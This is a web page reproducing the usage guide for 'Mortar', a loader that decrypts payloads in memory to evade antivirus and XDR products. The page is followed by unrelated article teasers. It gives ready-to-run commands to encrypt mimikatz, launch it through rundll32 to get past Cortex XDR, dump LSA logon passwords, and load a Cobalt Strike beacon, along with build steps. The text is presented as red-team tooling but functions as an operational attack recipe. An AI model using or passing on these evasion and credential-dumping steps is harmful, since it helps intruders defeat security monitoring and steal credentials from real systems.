Mortar is a red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions and it has been tested and confirmed bypass for the following:
Usage
root@kali>./encryptor -f mimikatz.exe -o bin.enc
Loader (DLL)
for bypassing Cortex XDR,add agressor.dll with bin.enc in the same folder and script the following bat file
@echo off
cmd.exe /c rundll32.exe agressor.dll,stealth
for normal usage you can directly execute the agressor.dll
rundll32.exe agressor.dll,dec
Loader (EXE)
the executable version has more options you can use, as you able to pass commands for the loaded binary
Mimikatz dump LSA
deliver.exe -d -c sekurlsa::logonpasswords -f mimikatz.enc
Cobalt strike beacon
deliver.exe -d -f cobalt.enc
Compiling the Loader (windows only)
the project has been coded using FPC(Free Pascal), the compiling procedures are straightforward by downloading and installing Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads) and navigate into file > open -> Run -> build
Compiling Encryptor(Linux/BSD/Arm/MacOS//windows)
either by downloading and installing Lazarus-IDE from the official site(https://www.lazarus-ide.org/index.php?page=downloads)
Debian & Ubuntu
apt install fpc
apt install lazarus-ide
General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…
How to Send POST Requests Using curl in Linux If you work with APIs, servers,…
If you are a Linux user, you have probably seen commands like chmod 777 while…
Vim and Vi are among the most powerful text editors in the Linux world. They…
Working with compressed files is a common task for any Linux user. Whether you are…
In the digital era, an email address can reveal much more than just a contact…